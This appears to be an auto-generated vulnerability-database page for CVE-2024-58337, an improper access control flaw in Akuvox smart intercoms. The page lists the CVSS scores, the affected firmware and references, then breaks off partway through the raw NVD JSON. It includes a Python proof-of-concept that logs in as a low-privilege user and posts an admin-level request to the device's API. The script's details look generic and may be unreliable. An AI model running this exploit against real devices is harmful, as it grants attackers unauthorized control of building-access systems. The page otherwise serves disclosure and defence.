CVE-2024-58337

Description

Akuvox Smart Intercom S539 contains an improper access control vulnerability that allows users with 'User' privileges to modify API access settings and configurations. Attackers can exploit this vulnerability to escalate privileges and gain unauthorized access to administrative functionalities.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:akuvox:s539_firmware:912.30.1.137:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:akuvox:s539:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:akuvox:s532_firmware:912.30.1.137:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:akuvox:s532:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:akuvox:x916_firmware:912.30.1.137:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:akuvox:x916:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:akuvox:x915_firmware:912.30.1.137:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:akuvox:x915:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:akuvox:x912_firmware:912.30.1.137:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:akuvox:x912:-:*:*:*:*:*:*:* - NOT VULNERABLE

Akuvox Smart Intercom S539 < 最新固件版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2024-58337 PoC - Akuvox Smart Intercom S539 Improper Access Control
# This PoC demonstrates privilege escalation via improper access control

import requests
import json
import sys

TARGET_HOST = "http://target-akuvox-device.local"
USERNAME = "user"  # Low privilege user
PASSWORD = "user123"

def exploit():
    print("[*] CVE-2024-58337 Improper Access Control Exploit")
    print("[*] Target: Akuvox Smart Intercom S539")
    
    # Step 1: Login with low privilege account
    session = requests.Session()
    login_data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    
    try:
        login_resp = session.post(f"{TARGET_HOST}/login", data=login_data, timeout=10)
        print(f"[+] Login attempt: {login_resp.status_code}")
        
        # Step 2: Exploit improper access control to modify API settings
        # This API endpoint should require admin privileges but doesn't
        exploit_data = {
            "action": "modify_api_access",
            "enable_admin_api": True,
            "user_level": "admin"
        }
        
        exploit_resp = session.post(
            f"{TARGET_HOST}/services/http/api",
            json=exploit_data,
            headers={"Content-Type": "application/json"},
            timeout=10
        )
        
        print(f"[+] Exploit request sent: {exploit_resp.status_code}")
        
        if exploit_resp.status_code == 200:
            print("[+] Privilege escalation successful!")
            print("[+] Attacker now has admin access to the device")
            
            # Step 3: Access admin functionalities
            admin_resp = session.get(f"{TARGET_HOST}/admin/config", timeout=10)
            print(f"[+] Admin panel access: {admin_resp.status_code}")
        else:
            print("[-] Exploit failed")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-58337
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-58337
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-58337/
[4] VulDB https://vuldb.com/cve/CVE-2024-58337
[5] https://cxsecurity.com/issue/WLB-2024110042
[6] https://packetstormsecurity.com/files/182870/
[7] https://www.vulncheck.com/advisories/akuvox-smart-intercom-s-improper-access-control-via-serviceshttpapi
[8] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5862.php
[9] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5862.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-58337", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:49.060", "lastModified": "2026-01-16T19:16:15.843", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Akuvox Smart Intercom S539 contains an improper access control vulnerability that allows users with 'User' privileges to modify API access settings and configurations. Attackers can exploit this vulnerability to escalate privileges and gain unauthorized access to administrative functionalities."}, {"lang": "es", "value": "Akuvox Smart Intercom S539 contiene una vulnerabilidad de control de acceso inadecuado que permite a los usuarios con privilegios de 'Usuario' modificar la configuración y los ajustes de acceso a la API. Los atacantes pueden explotar esta vulnerabilidad para escalar privilegios y obtener acceso no autorizado a funcionalidades administrativas."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:akuvox:s539_firmware:912.30.1.137:*:*:*:*:*:*:*", "matchCriteriaId": "4B93FB44-0535-41BC-BF4C-2D8F0C3FE85D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:akuvox:s539:-:*:*:*:*:*:*:*", "matchCriteriaId": "675AF904-EEDF-4BED-A22E-A1861DD9914F"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:akuvox:s532_firmware:912.30.1.137:*:*:*:*:*:*:*", "matchCriteriaId": "0FAC3868-AEFE-4D6A-9B46-E5D1C2EB71D8"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:akuvox:s532:-:*:*:*:*:*:*:*", "matchCriteriaId": "84E3746E-8A88-4859-B1AC-2EED52F5BAD2"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:akuvox:x916_firmware:912.30.1.137:*:*:*:*:*:*:*", "matchCriteriaId": "F0FBA49A-8092-4FCD-88CC-94112DEE5B60"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:akuvox:x916:-:*:*:*:*:*:*:*", "matchCriteriaId": "9DAFEA0C-F8CF-4F1D-8088-6F964806C6EB"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:akuvox:x915_firmware:912.30.1.137: ... (truncated)